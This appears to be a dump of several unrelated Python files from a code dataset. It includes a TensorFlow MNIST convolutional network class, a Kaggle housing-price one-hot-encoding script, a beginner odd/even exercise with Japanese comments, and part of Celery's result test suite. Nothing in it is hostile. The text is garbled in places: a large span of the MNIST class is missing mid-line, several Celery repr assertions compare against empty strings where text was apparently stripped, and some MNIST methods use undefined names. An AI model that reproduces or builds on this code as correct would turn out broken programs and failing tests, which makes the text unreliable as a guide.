self.session.run(tf.global_variables_initializer())\n\n if (load is not None):\n if load==\"default\":\n load =\"./Models/MNIST_model\"\n self.session = tf.Session()\n self.saver = tf.train.Saver()\n self.saver.restore(self.session,load)\n\n def save(self,location = \"./Models/MNIST_model\"):\n \"\"\"\n saves the network at the given file path, defaults to \"./Models/MNIST_model\".\n \"\"\"\n self.saver = tf.train.Saver()\n self.saver.save(self.session, location)\n\n def plot_images(self,images, cls_true, cls_pred=None):\n \"\"\"\n plots 9 supplied images in a 3x3 grid, together with the true and predicted class labels. \n \"\"\"\n assert len(images) == len(cls_true) == 9\n\n # Create figure with 3x3 sub-plots.\n fig, axes = plt.subplots(3, 3)\n fig.subplots_adjust(hspace=0.3, wspace=0.3)\n\n for i, ax in enumerate(axes.flat):\n # Plot image.\n ax.imshow(images[i].reshape(self.img_shape), cmap='binary')\n\n # Show true and predicted classes.\n if self.cls_pred is None:\n xlabel = \"True: {0}\".format(self.cls_true[i])\n else:\n xlabel = \"True: {0}, Pred: {1}\".format(self.cls_true[i], self.cls_pred[i])\n\n # Show the classes as the label on the x-axis.\n ax.set_xlabel(xlabel)\n\n # Remove ticks from the plot.\n ax.set_xticks([])\n ax.set_yticks([])\n\n # Ensure the plot is shown correctly with multiple plots\n # in a single Notebook cell.\n plt.show()\n\n def new_weights(self,shape):\n return tf.Variable(tf.truncated_normal(shape, stddev=0.05))\n\n def new_biases(self,length):\n return tf.Variable(tf.constant(0.05, shape=[length]))\n\n def new_conv_layer(self,\n input, # The previous layer.\n num_input_channels, # Num. channels in prev. layer.\n filter_size, # Width and height of each filter.\n num_filters, # Number of filters.\n use_pooling=True,\n use_biases =True\n ):\n\n # Shape of the filter-weights for the convolution.\n # This format is determined by the TensorFlow API.\n shape = [filter_size, filter_size, num_input_channels, num_filters]\n\n # Create new weights aka. filters with the given shape.\n weights = self.new_weights(shape=shape)\n\n if(use_biases):\n # Create new biases, one for each filter.\n biases = self.new_biases(length=num_filters)\n else:\n biases = []\n\n # Create the TensorFlow operation for convolution.\n # Note the strides are set to 1 in all dimensions.\n # The first and last stride must always be 1,\n # because the first is for the image-number and\n # the last is for the input-channel.\n # But e.g. strides=[1, 2, 2, 1] would mean that the filter\n # is moved 2 pixels across the x- and y-axis of the image.\n # The padding is set to 'SAME' which means the input image\n # is padded with zeroes so the size of the output is the same.\n layer = tf.nn.conv2d(input=input,\n filter=weights,\n strides=[1, 1, 1, 1],\n padding='SAME')\n\n # Add the biases to the results of the convolution.\n # A bias-value is added to each filter-channel.\n if(use_biases):\n layer += biases\n\n # Use pooling to down-sample the image resolution?\n if use_pooling:\n # This is 2x2 max-pooling, which means that we\n # consider 2x2 windows and select the largest value\n # in each window. Then we move 2 pixels to the next window.\n layer = tf.nn.max_pool(value=layer,\n ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1],\n padding='SAME')\n\n # Rectified Linear Unit (ReLU).\n # It calculates max(x, 0) for each input pixel x.\n # This adds some non-linearity to the formula and allows us\n # to learn more complicated functions.\n layer = tf.nn.relu(layer)\n\n # Note that ReLU is normally executed before the pooling,\n # but since relu(max_pool(x)) == max_pool(relu(x)) we can\n # save 75% of the relu-operations by max-pooling first.\n\n # We return both the resulting layer and the filter-weights\n # because we will plot the weights later.\n return layer, weights, biases\n\n def flatten_layer(self,layer):\n # Get the shape of the input layer.\n layer_shape = layer.get_shape()\n\n # The shape of the input layer is assumed to be:\n # layer_shape == [num_images, img_height, img_width, num_channels]\n\n # The number of features is: img_height * img_width * num_channels\n # We can use a function from TensorFlow to calculate this.\n num_features = layer_shape[1:4].num_elements()\n\n # Reshape the layer to [num_images, num_features].\n # Note that we just set the size of the second dimension\n # to num_features and the size of the first dimension to -1\n # which means the size in that dimension is calculated\n # so the total size of the tensor is unchanged from the reshaping.\n layer_flat = tf.reshape(layer, [-1, num_features])\n\n # The shape of the flattened layer is now:\n # [num_images, img_height * img_width * num_channels]\n\n # Return both the flattened layer and the number of features.\n return layer_flat, num_features\n\n def new_fc_layer(self,input, # The previous layer.\n num_inputs, # Num. inputs from prev. layer.\n num_outputs, # Num. outputs.\n use_relu=True,\n use_biases = True): # Use Rectified Linear Unit (ReLU)?\n\n # Create new weights and biases.\n weights = self.new_weights(shape=[num_inputs, num_outputs])\n if (use_biases):\n biases = self.new_biases(length=num_outputs)\n else:\n biases =[]\n # Calculate the layer as the matrix multiplication of\n # the input and weights, and then add the bias-values.\n if (use_biases):\n layer = tf.matmul(input, weights) + biases\n else:\n layer = tf.matmul(input, weights)\n # Use ReLU?\n if use_relu:\n layer = tf.nn.relu(layer)\n\n return layer,weights,biases\n\n def optimize(self,num_iterations):\n\n # Start-time used for printing time-usage below.\n start_time = time.time()\n\n for i in range(self.total_iterations,\n self.total_iterations + num_iterations):\n\n # Get a batch of training examples.\n # x_batch now holds a batch of images and\n # y_true_batch are the true labels for those images.\n x_batch, y_true_batch = self.data.train.next_batch(self.train_batch_size)\n\n # Put the batch into a dict with the proper names\n # for placeholder variables in the TensorFlow graph.\n feed_dict_train = {self.x: x_batch,\n self.y_true: y_true_batch}\n\n # Run the optimizer using this batch of training data.\n # TensorFlow assigns the variables in feed_dict_train\n # to the placeholder variables and then runs the optimizer.\n self.session.run(self.optimizer, feed_dict=feed_dict_train)\n\n # Print status every 100 iterations.\n if i % 100 == 0:\n # Calculate the accuracy on the training-set.\n acc = self.session.run(self.accuracy, feed_dict=feed_dict_train)\n\n # Message for printing.\n msg = \"Optimization Iteration: {0:>6}, Training Accuracy: {1:>6.1%}\"\n\n # Print it.\n print(msg.format(i + 1, acc))\n\n # Update the total number of iterations performed.\n self.total_iterations += num_iterations\n\n # Ending time.\n end_time = time.time()\n\n # Difference between start and end-times.\n time_dif = end_time - start_time\n\n # Print the time-usage.\n print(\"Time usage: \" + str(timedelta(seconds=int(round(time_dif)))))\n\n def plot_example_errors(self,cls_pred, correct):\n # This function is called from print_test_accuracy() below.\n\n # cls_pred is an array of the predicted class-number for\n # all images in the test-set.\n\n # correct is a boolean array whether the predicted class\n # is equal to the true class for each image in the test-set.\n\n # Negate the boolean array.\n incorrect = (correct == False)\n\n # Get the images from the test-set that have been\n # incorrectly classified.\n images = self.data.test.images[incorrect]\n\n # Get the predicted classes for those images.\n cls_pred = cls_pred[incorrect]\n\n # Get the true classes for those images.\n cls_true = self.data.test.cls[incorrect]\n\n # Plot the first 9 images.\n plot_images(images=images[0:9],\n cls_true=cls_true[0:9],\n cls_pred=cls_pred[0:9])\n\n def plot_confusion_matrix(self,cls_pred):\n # This is called from print_test_accuracy() below.\n\n # cls_pred is an array of the predicted class-number for\n # all images in the test-set.\n\n # Get the true classifications for the test-set.\n cls_true = self.data.test.cls\n\n # Get the confusion matrix using sklearn.\n cm = confusion_matrix(y_true=cls_true,\n y_pred=cls_pred)\n\n # Print the confusion matrix as text.\n print(cm)\n\n # Plot the confusion matrix as an image.\n plt.matshow(cm)\n\n # Make various adjustments to the plot.\n plt.colorbar()\n tick_marks = np.arange(self.num_classes)\n plt.xticks(tick_marks, range(self.num_classes))\n plt.yticks(tick_marks, range(self.num_classes))\n plt.xlabel('Predicted')\n plt.ylabel('True')\n\n # Ensure the plot is shown correctly with multiple plots\n # in a single Notebook cell.\n plt.show()\n\n # Split the test-set into smaller batches of this size.\n\n def print_test_accuracy(self,show_example_errors=False,\n show_confusion_matrix=False):\n # Number of images in the test-set.\n num_test = len(self.data.test.images)\n\n # Allocate an array for the predicted classes which\n # will be calculated in batches and filled into this array.\n cls_pred = np.zeros(shape=num_test, dtype=np.int)\n\n # Now calculate the predicted classes for the batches.\n # We will just iterate through all the batches.\n # There might be a more clever and Pythonic way of doing this.\n\n # The starting index for the next batch is denoted i.\n i = 0\n\n while i < num_test:\n # The ending index for the next batch is denoted j.\n j = min(i + self.test_batch_size, num_test)\n\n # Get the images from the test-set between index i and j.\n images = self.data.test.images[i:j, :]\n\n # Get the associated labels.\n labels = self.data.test.labels[i:j, :]\n\n # Create a feed-dict with these images and labels.\n feed_dict = {self.x: images,\n self.y_true: labels}\n\n # Calculate the predicted class using TensorFlow.\n cls_pred[i:j] = self.session.run(y_pred_cls, feed_dict=feed_dict)\n\n # Set the start-index for the next batch to the\n # end-index of the current batch.\n i = j\n\n # Convenience variable for the true class-numbers of the test-set.\n cls_true = self.data.test.cls\n\n # Create a boolean array whether each image is correctly classified.\n correct = (cls_true == cls_pred)\n\n # Calculate the number of correctly classified images.\n # When summing a boolean array, False means 0 and True means 1.\n correct_sum = correct.sum()\n\n # Classification accuracy is the number of correctly classified\n # images divided by the total number of images in the test-set.\n acc = float(correct_sum) / num_test\n\n # Print the accuracy.\n msg = \"Accuracy on Test-Set: {0:.1%} ({1} / {2})\"\n print(msg.format(acc, correct_sum, num_test))\n\n # Plot some examples of mis-classifications, if desired.\n if show_example_errors:\n print(\"Example errors:\")\n plot_example_errors(cls_pred=cls_pred, correct=correct)\n\n # Plot the confusion matrix, if desired.\n if show_confusion_matrix:\n print(\"Confusion Matrix:\")\n plot_confusion_matrix(cls_pred=cls_pred)\n\n def plot_conv_weights(self,weights, input_channel=0):\n # Assume weights are TensorFlow ops for 4-dim variables\n # e.g. weights_conv1 or weights_conv2.\n\n # Retrieve the values of the weight-variables from TensorFlow.\n # A feed-dict is not necessary because nothing is calculated.\n w = self.session.run(weights)\n\n # Get the lowest and highest values for the weights.\n # This is used to correct the colour intensity across\n # the images so they can be compared with each other.\n w_min = np.min(w)\n w_max = np.max(w)\n\n # Number of filters used in the conv. layer.\n num_filters = w.shape[3]\n\n # Number of grids to plot.\n # Rounded-up, square-root of the number of filters.\n num_grids = math.ceil(math.sqrt(num_filters))\n\n # Create figure with a grid of sub-plots.\n fig, axes = plt.subplots(num_grids, num_grids)\n\n # Plot all the filter-weights.\n for i, ax in enumerate(axes.flat):\n # Only plot the valid filter-weights.\n if i=0))\n R.append(np.diag(r))\n\n #combine the weights, bias and ReLU matrices to produce W and B matrices\n W = 1\n Btemp = biases.copy()\n for L in range (0,nlayers-nlayersmin):\n #print(W.shape)\n Btemp[-1-L] = (Btemp[-1-L]).dot(W)\n W= (R[-2-L]).dot(weights[-1-L]).dot(W)\n\n B = sum(Btemp)\n return W,B,y\n","repo_name":"AndrewLouw/Saliency-Comparison","sub_path":"Mnist_net.py","file_name":"Mnist_net.py","file_ext":"py","file_size_in_byte":32566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"9972588677","text":"# Read the data\nimport pandas as pd\ntrain_data = pd.read_csv('../input/train.csv')\ntest_data = pd.read_csv('../input/test.csv')\n\n# Drop houses where the target is missing\ntrain_data.dropna(axis=0, subset=['SalePrice'], inplace=True)\n\ntarget = train_data.SalePrice\n\n# Since missing values isn't the focus of this tutorial, we use the simplest\n# possible approach, which drops these columns.\n# For more detail (and a better approach) to missing values, see\n# https://www.kaggle.com/dansbecker/handling-missing-values\ncols_with_missing = [col for col in train_data.columns\n if train_data[col].isnull().any()]\ncandidate_train_predictors = train_data.drop(['Id', 'SalePrice'] + cols_with_missing, axis=1)\ncandidate_test_predictors = test_data.drop(['Id'] + cols_with_missing, axis=1)\n\n# \"cardinality\" means the number of unique values in a column.\n# We use it as our only way to select categorical columns here. This is convenient, though\n# a little arbitrary.\nlow_cardinality_cols = [cname for cname in candidate_train_predictors.columns if\n candidate_train_predictors[cname].nunique() < 10 and\n candidate_train_predictors[cname].dtype == \"object\"]\nnumeric_cols = [cname for cname in candidate_train_predictors.columns if\n candidate_train_predictors[cname].dtype in ['int64', 'float64']]\nmy_cols = low_cardinality_cols + numeric_cols\ntrain_predictors = candidate_train_predictors[my_cols]\ntest_predictors = candidate_test_predictors[my_cols]\n\n\n\n#Let's see a random sample of dtypes from our prediction data:\ntrain_predictors.dtypes.sample(10)\n\n\n#Pandas offers a convenient function called **get_dummies** to get one-hot encodings\none_hot_encoded_training_predictors = pd.get_dummies(train_predictors)\n\n\n\n\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.ensemble import RandomForestRegressor\n\ndef get_mae(X, y):\n # multiple by -1 to make positive MAE score instead of neg value returned as sklearn convention\n return -1 * cross_val_score(RandomForestRegressor(50),\n X, y,\n scoring = 'neg_mean_absolute_error').mean()\n\npredictors_without_categoricals = train_predictors.select_dtypes(exclude=['object'])\n\nmae_without_categoricals = get_mae(predictors_without_categoricals, target)\n\nmae_one_hot_encoded = get_mae(one_hot_encoded_training_predictors, target)\n\nprint('Mean Absolute Error when Dropping Categoricals: ' + str(int(mae_without_categoricals)))\nprint('Mean Abslute Error with One-Hot Encoding: ' + str(int(mae_one_hot_encoded)))\n\none_hot_encoded_training_predictors = pd.get_dummies(train_predictors)\none_hot_encoded_test_predictors = pd.get_dummies(test_predictors)\nfinal_train, final_test = one_hot_encoded_training_predictors.align(one_hot_encoded_test_predictors,\n join='left',\n axis=1)\n","repo_name":"Yasaman1997/Machine_Learning","sub_path":"Kaggle_ML/Projects/predict housing prices/Handling Missing Values/Using Categorical Data with One Hot Encoding.py","file_name":"Using Categorical Data with One Hot Encoding.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"}
+{"seq_id":"3192457036","text":"# 演習0【前回の復習】\n# 整数を入力してもらう。\n# その整数が奇数の場合は「奇数です」と1度だけ出力する。\n# その整数が偶数の場合は「偶数です」と入力された数の回数出力する。\n# というプログラムを作成してください。\n# 例1)\n# 整数を入力してください:5\n# 結果:\n# 奇数です\nch = input(\"数字を入力してください\")\nnum = int(ch)\n\n# if num % 2 == 1:\n# print(\"奇数です\")\n# else:\n# print(\"偶数です\")\n\nif num % 2 == 0:\n count = num # 入力された値\n msg = \"偶数です\"\nelse:\n count = 1\n msg = \"奇数です\"\n\nfor i in range(count):\n print(msg)\n\n\n# 例2)\n# 整数を入力してください:4\n# 結果:\n# 偶数です\n# 偶数です\n# 偶数です\n# 偶数です\n# ch = input(\"整数を入力してください\")\n# num = int(ch)\n\n# if num % 2 == 1:\n# print(\"奇数です\" * num)\n# else:\n# print(\"偶数です\\n\" * num)\n\n\n# プログラムの流れも自分で考えてみましょう。\n# 難しい場合は、分かる部分からプログラムを書いてみましょう。\n","repo_name":"Masaru-DaL/School","sub_path":"term.1/PythonProgramming_a/2022.04.28/exercise0.py","file_name":"exercise0.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71708571848","text":"from __future__ import absolute_import\n\nfrom contextlib import contextmanager\n\nfrom celery import states\nfrom celery.exceptions import IncompleteStream, TimeoutError\nfrom celery.five import range\nfrom celery.result import (\n AsyncResult,\n EagerResult,\n TaskSetResult,\n result_from_tuple,\n)\nfrom celery.utils import uuid\nfrom celery.utils.serialization import pickle\n\nfrom celery.tests.case import AppCase, Mock, depends_on_current_app, patch\n\n\ndef mock_task(name, state, result):\n return dict(id=uuid(), name=name, state=state, result=result)\n\n\ndef save_result(app, task):\n traceback = 'Some traceback'\n if task['state'] == states.SUCCESS:\n app.backend.mark_as_done(task['id'], task['result'])\n elif task['state'] == states.RETRY:\n app.backend.mark_as_retry(\n task['id'], task['result'], traceback=traceback,\n )\n else:\n app.backend.mark_as_failure(\n task['id'], task['result'], traceback=traceback,\n )\n\n\ndef make_mock_group(app, size=10):\n tasks = [mock_task('ts%d' % i, states.SUCCESS, i) for i in range(size)]\n [save_result(app, task) for task in tasks]\n return [app.AsyncResult(task['id']) for task in tasks]\n\n\nclass test_AsyncResult(AppCase):\n\n def setup(self):\n self.task1 = mock_task('task1', states.SUCCESS, 'the')\n self.task2 = mock_task('task2', states.SUCCESS, 'quick')\n self.task3 = mock_task('task3', states.FAILURE, KeyError('brown'))\n self.task4 = mock_task('task3', states.RETRY, KeyError('red'))\n\n for task in (self.task1, self.task2, self.task3, self.task4):\n save_result(self.app, task)\n\n @self.app.task(shared=False)\n def mytask():\n pass\n self.mytask = mytask\n\n def test_compat_properties(self):\n x = self.app.AsyncResult('1')\n self.assertEqual(x.task_id, x.id)\n x.task_id = '2'\n self.assertEqual(x.id, '2')\n\n def test_children(self):\n x = self.app.AsyncResult('1')\n children = [EagerResult(str(i), i, states.SUCCESS) for i in range(3)]\n x._cache = {'children': children, 'status': states.SUCCESS}\n x.backend = Mock()\n self.assertTrue(x.children)\n self.assertEqual(len(x.children), 3)\n\n def test_propagates_for_parent(self):\n x = self.app.AsyncResult(uuid())\n x.backend = Mock(name='backend')\n x.backend.get_task_meta.return_value = {}\n x.backend.wait_for.return_value = {\n 'status': states.SUCCESS, 'result': 84,\n }\n x.parent = EagerResult(uuid(), KeyError('foo'), states.FAILURE)\n with self.assertRaises(KeyError):\n x.get(propagate=True)\n self.assertFalse(x.backend.wait_for.called)\n\n x.parent = EagerResult(uuid(), 42, states.SUCCESS)\n self.assertEqual(x.get(propagate=True), 84)\n self.assertTrue(x.backend.wait_for.called)\n\n def test_get_children(self):\n tid = uuid()\n x = self.app.AsyncResult(tid)\n child = [self.app.AsyncResult(uuid()).as_tuple()\n for i in range(10)]\n x._cache = {'children': child}\n self.assertTrue(x.children)\n self.assertEqual(len(x.children), 10)\n\n x._cache = {'status': states.SUCCESS}\n x.backend._cache[tid] = {'result': None}\n self.assertIsNone(x.children)\n\n def test_build_graph_get_leaf_collect(self):\n x = self.app.AsyncResult('1')\n x.backend._cache['1'] = {'status': states.SUCCESS, 'result': None}\n c = [EagerResult(str(i), i, states.SUCCESS) for i in range(3)]\n x.iterdeps = Mock()\n x.iterdeps.return_value = (\n (None, x),\n (x, c[0]),\n (c[0], c[1]),\n (c[1], c[2])\n )\n x.backend.READY_STATES = states.READY_STATES\n self.assertTrue(x.graph)\n\n self.assertIs(x.get_leaf(), 2)\n\n it = x.collect()\n self.assertListEqual(list(it), [\n (x, None),\n (c[0], 0),\n (c[1], 1),\n (c[2], 2),\n ])\n\n def test_iterdeps(self):\n x = self.app.AsyncResult('1')\n c = [EagerResult(str(i), i, states.SUCCESS) for i in range(3)]\n x._cache = {'status': states.SUCCESS, 'result': None, 'children': c}\n for child in c:\n child.backend = Mock()\n child.backend.get_children.return_value = []\n it = x.iterdeps()\n self.assertListEqual(list(it), [\n (None, x),\n (x, c[0]),\n (x, c[1]),\n (x, c[2]),\n ])\n x._cache = None\n x.ready = Mock()\n x.ready.return_value = False\n with self.assertRaises(IncompleteStream):\n list(x.iterdeps())\n list(x.iterdeps(intermediate=True))\n\n def test_eq_not_implemented(self):\n self.assertFalse(self.app.AsyncResult('1') == object())\n\n @depends_on_current_app\n def test_reduce(self):\n a1 = self.app.AsyncResult('uuid', task_name=self.mytask.name)\n restored = pickle.loads(pickle.dumps(a1))\n self.assertEqual(restored.id, 'uuid')\n self.assertEqual(restored.task_name, self.mytask.name)\n\n a2 = self.app.AsyncResult('uuid')\n self.assertEqual(pickle.loads(pickle.dumps(a2)).id, 'uuid')\n\n def test_successful(self):\n ok_res = self.app.AsyncResult(self.task1['id'])\n nok_res = self.app.AsyncResult(self.task3['id'])\n nok_res2 = self.app.AsyncResult(self.task4['id'])\n\n self.assertTrue(ok_res.successful())\n self.assertFalse(nok_res.successful())\n self.assertFalse(nok_res2.successful())\n\n pending_res = self.app.AsyncResult(uuid())\n self.assertFalse(pending_res.successful())\n\n def test_str(self):\n ok_res = self.app.AsyncResult(self.task1['id'])\n ok2_res = self.app.AsyncResult(self.task2['id'])\n nok_res = self.app.AsyncResult(self.task3['id'])\n self.assertEqual(str(ok_res), self.task1['id'])\n self.assertEqual(str(ok2_res), self.task2['id'])\n self.assertEqual(str(nok_res), self.task3['id'])\n\n pending_id = uuid()\n pending_res = self.app.AsyncResult(pending_id)\n self.assertEqual(str(pending_res), pending_id)\n\n def test_repr(self):\n ok_res = self.app.AsyncResult(self.task1['id'])\n ok2_res = self.app.AsyncResult(self.task2['id'])\n nok_res = self.app.AsyncResult(self.task3['id'])\n self.assertEqual(repr(ok_res), '' % (\n self.task1['id']))\n self.assertEqual(repr(ok2_res), '' % (\n self.task2['id']))\n self.assertEqual(repr(nok_res), '' % (\n self.task3['id']))\n\n pending_id = uuid()\n pending_res = self.app.AsyncResult(pending_id)\n self.assertEqual(repr(pending_res), '' % (\n pending_id))\n\n def test_hash(self):\n self.assertEqual(hash(self.app.AsyncResult('x0w991')),\n hash(self.app.AsyncResult('x0w991')))\n self.assertNotEqual(hash(self.app.AsyncResult('x0w991')),\n hash(self.app.AsyncResult('x1w991')))\n\n def test_get_traceback(self):\n ok_res = self.app.AsyncResult(self.task1['id'])\n nok_res = self.app.AsyncResult(self.task3['id'])\n nok_res2 = self.app.AsyncResult(self.task4['id'])\n self.assertFalse(ok_res.traceback)\n self.assertTrue(nok_res.traceback)\n self.assertTrue(nok_res2.traceback)\n\n pending_res = self.app.AsyncResult(uuid())\n self.assertFalse(pending_res.traceback)\n\n def test_get(self):\n ok_res = self.app.AsyncResult(self.task1['id'])\n ok2_res = self.app.AsyncResult(self.task2['id'])\n nok_res = self.app.AsyncResult(self.task3['id'])\n nok2_res = self.app.AsyncResult(self.task4['id'])\n\n self.assertEqual(ok_res.get(), 'the')\n self.assertEqual(ok2_res.get(), 'quick')\n with self.assertRaises(KeyError):\n nok_res.get()\n self.assertTrue(nok_res.get(propagate=False))\n self.assertIsInstance(nok2_res.result, KeyError)\n self.assertEqual(ok_res.info, 'the')\n\n def test_get_timeout(self):\n res = self.app.AsyncResult(self.task4['id']) # has RETRY state\n with self.assertRaises(TimeoutError):\n res.get(timeout=0.001)\n\n pending_res = self.app.AsyncResult(uuid())\n with patch('celery.result.time') as _time:\n with self.assertRaises(TimeoutError):\n pending_res.get(timeout=0.001, interval=0.001)\n _time.sleep.assert_called_with(0.001)\n\n def test_get_timeout_longer(self):\n res = self.app.AsyncResult(self.task4['id']) # has RETRY state\n with patch('celery.result.time') as _time:\n with self.assertRaises(TimeoutError):\n res.get(timeout=1, interval=1)\n _time.sleep.assert_called_with(1)\n\n def test_ready(self):\n oks = (self.app.AsyncResult(self.task1['id']),\n self.app.AsyncResult(self.task2['id']),\n self.app.AsyncResult(self.task3['id']))\n self.assertTrue(all(result.ready() for result in oks))\n self.assertFalse(self.app.AsyncResult(self.task4['id']).ready())\n\n self.assertFalse(self.app.AsyncResult(uuid()).ready())\n\n\nclass test_ResultSet(AppCase):\n\n def test_resultset_repr(self):\n self.assertTrue(repr(self.app.ResultSet(\n [self.app.AsyncResult(t) for t in ['1', '2', '3']])))\n\n def test_eq_other(self):\n self.assertFalse(self.app.ResultSet([1, 3, 3]) == 1)\n self.assertTrue(self.app.ResultSet([1]) == self.app.ResultSet([1]))\n\n def test_get(self):\n x = self.app.ResultSet([self.app.AsyncResult(t) for t in [1, 2, 3]])\n b = x.results[0].backend = Mock()\n b.supports_native_join = False\n x.join_native = Mock()\n x.join = Mock()\n x.get()\n self.assertTrue(x.join.called)\n b.supports_native_join = True\n x.get()\n self.assertTrue(x.join_native.called)\n\n def test_get_empty(self):\n x = self.app.ResultSet([])\n self.assertIsNone(x.supports_native_join)\n x.join = Mock(name='join')\n x.get()\n self.assertTrue(x.join.called)\n\n def test_add(self):\n x = self.app.ResultSet([1])\n x.add(2)\n self.assertEqual(len(x), 2)\n x.add(2)\n self.assertEqual(len(x), 2)\n\n @contextmanager\n def dummy_copy(self):\n with patch('celery.result.copy') as copy:\n\n def passt(arg):\n return arg\n copy.side_effect = passt\n\n yield\n\n def test_iterate_respects_subpolling_interval(self):\n r1 = self.app.AsyncResult(uuid())\n r2 = self.app.AsyncResult(uuid())\n backend = r1.backend = r2.backend = Mock()\n backend.subpolling_interval = 10\n\n ready = r1.ready = r2.ready = Mock()\n\n def se(*args, **kwargs):\n ready.side_effect = KeyError()\n return False\n ready.return_value = False\n ready.side_effect = se\n\n x = self.app.ResultSet([r1, r2])\n with self.dummy_copy():\n with patch('celery.result.time') as _time:\n with self.assertPendingDeprecation():\n with self.assertRaises(KeyError):\n list(x.iterate())\n _time.sleep.assert_called_with(10)\n\n backend.subpolling_interval = 0\n with patch('celery.result.time') as _time:\n with self.assertPendingDeprecation():\n with self.assertRaises(KeyError):\n ready.return_value = False\n ready.side_effect = se\n list(x.iterate())\n self.assertFalse(_time.sleep.called)\n\n def test_times_out(self):\n r1 = self.app.AsyncResult(uuid)\n r1.ready = Mock()\n r1.ready.return_value = False\n x = self.app.ResultSet([r1])\n with self.dummy_copy():\n with patch('celery.result.time'):\n with self.assertPendingDeprecation():\n with self.assertRaises(TimeoutError):\n list(x.iterate(timeout=1))\n\n def test_add_discard(self):\n x = self.app.ResultSet([])\n x.add(self.app.AsyncResult('1'))\n self.assertIn(self.app.AsyncResult('1'), x.results)\n x.discard(self.app.AsyncResult('1'))\n x.discard(self.app.AsyncResult('1'))\n x.discard('1')\n self.assertNotIn(self.app.AsyncResult('1'), x.results)\n\n x.update([self.app.AsyncResult('2')])\n\n def test_clear(self):\n x = self.app.ResultSet([])\n r = x.results\n x.clear()\n self.assertIs(x.results, r)\n\n\nclass MockAsyncResultFailure(AsyncResult):\n\n @property\n def result(self):\n return KeyError('baz')\n\n @property\n def state(self):\n return states.FAILURE\n\n def get(self, propagate=True, **kwargs):\n if propagate:\n raise self.result\n return self.result\n\n\nclass MockAsyncResultSuccess(AsyncResult):\n forgotten = False\n\n def forget(self):\n self.forgotten = True\n\n @property\n def result(self):\n return 42\n\n @property\n def state(self):\n return states.SUCCESS\n\n def get(self, **kwargs):\n return self.result\n\n\nclass SimpleBackend(object):\n ids = []\n\n def __init__(self, ids=[]):\n self.ids = ids\n\n def get_many(self, *args, **kwargs):\n return ((id, {'result': i, 'status': states.SUCCESS})\n for i, id in enumerate(self.ids))\n\n\nclass test_TaskSetResult(AppCase):\n\n def setup(self):\n self.size = 10\n self.ts = TaskSetResult(uuid(), make_mock_group(self.app, self.size))\n\n def test_total(self):\n self.assertEqual(self.ts.total, self.size)\n\n def test_compat_properties(self):\n self.assertEqual(self.ts.taskset_id, self.ts.id)\n self.ts.taskset_id = 'foo'\n self.assertEqual(self.ts.taskset_id, 'foo')\n\n def test_compat_subtasks_kwarg(self):\n x = TaskSetResult(uuid(), subtasks=[1, 2, 3])\n self.assertEqual(x.results, [1, 2, 3])\n\n def test_itersubtasks(self):\n it = self.ts.itersubtasks()\n\n for i, t in enumerate(it):\n self.assertEqual(t.get(), i)\n\n\nclass test_GroupResult(AppCase):\n\n def setup(self):\n self.size = 10\n self.ts = self.app.GroupResult(\n uuid(), make_mock_group(self.app, self.size),\n )\n\n @depends_on_current_app\n def test_is_pickleable(self):\n ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])\n self.assertEqual(pickle.loads(pickle.dumps(ts)), ts)\n ts2 = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])\n self.assertEqual(pickle.loads(pickle.dumps(ts2)), ts2)\n\n def test_len(self):\n self.assertEqual(len(self.ts), self.size)\n\n def test_eq_other(self):\n self.assertFalse(self.ts == 1)\n\n @depends_on_current_app\n def test_reduce(self):\n self.assertTrue(pickle.loads(pickle.dumps(self.ts)))\n\n def test_iterate_raises(self):\n ar = MockAsyncResultFailure(uuid(), app=self.app)\n ts = self.app.GroupResult(uuid(), [ar])\n with self.assertPendingDeprecation():\n it = ts.iterate()\n with self.assertRaises(KeyError):\n next(it)\n\n def test_forget(self):\n subs = [MockAsyncResultSuccess(uuid(), app=self.app),\n MockAsyncResultSuccess(uuid(), app=self.app)]\n ts = self.app.GroupResult(uuid(), subs)\n ts.forget()\n for sub in subs:\n self.assertTrue(sub.forgotten)\n\n def test_getitem(self):\n subs = [MockAsyncResultSuccess(uuid(), app=self.app),\n MockAsyncResultSuccess(uuid(), app=self.app)]\n ts = self.app.GroupResult(uuid(), subs)\n self.assertIs(ts[0], subs[0])\n\n def test_save_restore(self):\n subs = [MockAsyncResultSuccess(uuid(), app=self.app),\n MockAsyncResultSuccess(uuid(), app=self.app)]\n ts = self.app.GroupResult(uuid(), subs)\n ts.save()\n with self.assertRaises(AttributeError):\n ts.save(backend=object())\n self.assertEqual(self.app.GroupResult.restore(ts.id).subtasks,\n ts.subtasks)\n ts.delete()\n self.assertIsNone(self.app.GroupResult.restore(ts.id))\n with self.assertRaises(AttributeError):\n self.app.GroupResult.restore(ts.id, backend=object())\n\n def test_join_native(self):\n backend = SimpleBackend()\n subtasks = [self.app.AsyncResult(uuid(), backend=backend)\n for i in range(10)]\n ts = self.app.GroupResult(uuid(), subtasks)\n ts.app.backend = backend\n backend.ids = [subtask.id for subtask in subtasks]\n res = ts.join_native()\n self.assertEqual(res, list(range(10)))\n\n def test_join_native_raises(self):\n ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])\n ts.iter_native = Mock()\n ts.iter_native.return_value = iter([\n (uuid(), {'status': states.FAILURE, 'result': KeyError()})\n ])\n with self.assertRaises(KeyError):\n ts.join_native(propagate=True)\n\n def test_failed_join_report(self):\n res = Mock()\n ts = self.app.GroupResult(uuid(), [res])\n res.state = states.FAILURE\n res.backend.is_cached.return_value = True\n self.assertIs(next(ts._failed_join_report()), res)\n res.backend.is_cached.return_value = False\n with self.assertRaises(StopIteration):\n next(ts._failed_join_report())\n\n def test_repr(self):\n self.assertTrue(repr(\n self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])\n ))\n\n def test_children_is_results(self):\n ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])\n self.assertIs(ts.children, ts.results)\n\n def test_iter_native(self):\n backend = SimpleBackend()\n subtasks = [self.app.AsyncResult(uuid(), backend=backend)\n for i in range(10)]\n ts = self.app.GroupResult(uuid(), subtasks)\n ts.app.backend = backend\n backend.ids = [subtask.id for subtask in 